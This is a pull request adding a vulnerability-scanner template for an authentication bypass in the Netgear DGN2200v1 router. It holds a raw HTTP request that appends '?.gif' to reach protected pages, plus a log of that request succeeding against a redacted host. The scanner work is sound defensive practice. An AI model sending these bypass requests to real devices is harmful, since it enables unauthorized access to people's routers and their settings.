### PR TITLE
Create netgear-router-auth-bypass.yaml

### DIFF
--- a/vulnerabilities/other/netgear-router-auth-bypass.yaml
+++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml
@@ -1,0 +1,41 @@
+id: netgear-router-auth-bypass
+
+info:
+  name: Netgear DGN2200v1 Router Authentication Bypass
+  author: gy741
+  severity: high
+  description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”).
+  reference: |
+    - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
+    - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
+  tags: netgear,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /WAN_wan.htm?.gif HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
+        Connection: close
+        Accept: */*
+        Accept-Language: en
+        Accept-Encoding: gzip
+
+      - |
+        GET /WAN_wan.htm?.gif HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
+        Connection: close
+        Accept: */*
+        Accept-Language: en
+        Accept-Encoding: gzip
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<title>WAN Setup</title>"


### PR DESCRIPTION
Hello

Added Netgear DGN2200v1 Router Authentication Bypass detection rule.

I wrote it to request the transfer twice.

Because when I make the first request, I get a 401 error like below.

The second request calls ```200 OK``` and detects the vulnerability.

```
GET /WAN_wan.htm?.gif HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close

[INF] [netgear-router-auth-bypass] Dumped HTTP response for http://XXX/WAN_wan.htm?.gif

HTTP/1.0 401 Unauthorized
Connection: close
Content-Type: text/html
Www-Authenticate: Basic realm="NETGEAR DGN2200"

<html><head><title> Authorization warning</title><script language="javascript" type="text/javascript">function cancelevent(){document.formname.submit();}</script></head><body onload=cancelevent()><form name="formname" action="ptimeout.cgi" method="POST"><b>401 Unauthorized</b><input type="hidden" name="inputname" value=""></form></body></html>
[INF] [netgear-router-auth-bypass] Dumped HTTP request for http://XXX/

GET /WAN_wan.htm?.gif HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close

[INF] [netgear-router-auth-bypass] Dumped HTTP response for http://XXX/WAN_wan.htm?.gif

HTTP/1.0 200 OK
Connection: close
Content-Length: 7003
Content-Type: text/html

<html>
<head>
<META name="description" content="DGN2200">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<META http-equiv="Content-Style-Type" content="text/css">
<META http-equiv="Pragma" content="no-cache">
<META HTTP-equiv="Cache-Control" content="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="Mon, 06 Jan 1990 00:00:01 GMT">

<title>WAN Setup</title>
```
